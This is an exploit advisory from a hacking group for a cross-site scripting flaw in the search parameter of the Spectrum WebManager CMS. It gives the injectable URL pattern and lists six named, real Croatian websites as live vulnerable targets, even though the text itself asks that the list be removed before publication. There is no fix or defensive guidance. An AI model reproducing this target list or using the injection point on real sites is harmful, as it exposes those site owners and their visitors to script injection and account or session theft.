####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org
.:. Script : Spectrum Software WebManager CMS
.:. Info link: http://www.spectrum.hr/proizvodi/web_manager_-_cms/default.aspx
.:. Bug Type : Cross-site scripting (XSS)
 ####################################################################

===[ Exploit ]===

http://www.server/Search_1.aspx?pojam=[XSS]

===[ Example ]===

http://www.server/Search_1.aspx?pojam=

LIVE DEMO(for validation only, remove it from publication!):

http://www.bpz.hr/Search_1.aspx?pojam=
http://www.halajko.hr/Search_1.aspx?pojam=
http://www.garten.hr/Search_1.aspx?pojam=
http://www.freezone-brod.hr/Search_1.aspx?pojam=
http://www.dd-aparati.hr/Search_1.aspx?pojam=
http://www.vuko.hr/Search_1.aspx?pojam=


Greetz to ALL EVILZONE.org members!!!
Pozdrav za sve iz Srbije!!! :-)))